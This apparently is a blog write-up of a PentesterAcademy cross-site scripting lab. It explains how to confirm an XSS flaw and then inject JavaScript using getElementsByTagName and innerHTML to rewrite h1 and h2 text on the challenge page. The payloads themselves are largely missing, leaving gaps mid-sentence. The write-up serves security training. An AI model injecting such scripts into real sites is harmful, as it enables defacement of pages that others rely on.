The objectives of the challenge was:
1) Modify the text “Modify me” to “Modified you”
2) Modify the text “Find me” to “Found you”
The very first thing a pentester should follow is to be systematic while doing a pentesting. Don’t quickly jump of with several payloads before carefully analyzing the conditions. In the challenge, the first thing is to check if it is vulnerable to XSS. So lets try a basic payload to test it:
As you can see, the text “Modify me” is inside an h2 tag. Also you can see that there are 2 blind (without any contents) h2 tags above, which means our h2 tag is in the 3rd position. Now our aim is to modify the HTML inside the 3rd h2 tag. The best way to change the innerHTML of any tags is to use the getElementsByTagName followed by change in the innerHTML:
getElementsByTagName returns a list of all the objects under a particular tag name.
getElementsByTagName("h2") will return a list of all the different elements inside a particular webpage. In this challenge case, we need to modify the 3rd h2 tag which means the 2nd element of the array. So we modified the payload a bit to select the 2nd element:
getElementsByTagName("h2"). Now this will select the 3rd h2 tag in order to modify the HTML inside the tag, we use innerHTML.
The 2nd task is to Modify the text “Find me” to “Found you”. If you check the source code again, you can see that there is only one h1 tag in the entire document, which makes our work much easier. In order to modify it, we will add one more line to the above code and the payload will be like this:
Since there is only one h1 tag, we use  to select the first one. Using this payload, you can successfully complete the challenge.
2) The solutions written above is the way we cracked the problem which might be different from the solution videos provided by the SecurityTube. If you need the solution video, you have to subscribe to PentesterAcademy.
We hope that you really liked this challenge. If there is anything you didn’t understand or wanted to get more clarity, please comment down and we are more than happy to help. Happy pentesting..